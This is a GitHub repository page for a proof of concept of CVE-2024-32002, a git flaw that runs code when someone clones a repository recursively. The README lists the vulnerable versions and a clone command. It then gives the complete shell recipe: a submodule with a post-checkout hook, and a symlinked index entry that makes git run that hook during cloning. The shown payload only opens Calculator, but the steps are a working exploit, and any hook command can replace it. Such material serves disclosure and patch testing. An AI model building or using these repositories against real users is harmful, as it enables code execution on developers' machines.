Skip to content

A proof of concept for the git vulnerability CVE-2024-32002

Notifications You must be signed in to change notification settings

markuta/CVE-2024-32002

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

8 Commits
 
 
 
 
 
 
 
 

Repository files navigation

CVE-2024-32002

A simple proof-of-concept that executes Calculator (macOS example only). When using git clone --recursive command, this repo will also pull https://github.com/markuta/hooky, which contains a post-checkout script. Mostly based on the commit fix t7406-submodule-update.sh file.

Run

Note: Versions prior to 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2, and 2.39.4 are vulnerable.

git clone --recursive github.com/markuta/CVE-2024-32002

Create your own repositories

# Submodule repo (payload)
git init hooky
cd hooky
mkdir -p y/hooks 
echo "open -a Calculator.app" > y/hooks/post-checkout
chmod +x y/hooks/post-checkout
git add y/hooks/post-checkout
git commit -m post-checkout
hook_repo_path="$(pwd)"

# Main repo
git init captain
git submodule add --name x/y "$hook_repo_path" A/modules/x
git commit -m add-submodule
printf .git >dotgit.txt
git hash-object -w --stdin <dotgit.txt >dot-git.hash
printf "120000 %s 0\ta\n" "$(cat dot-git.hash)" >index.info
git update-index --index-info <index.info
git commit -m add-symlink

Further info

More info about the vulnerability can be found here and here.

About

A proof of concept for the git vulnerability CVE-2024-32002

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published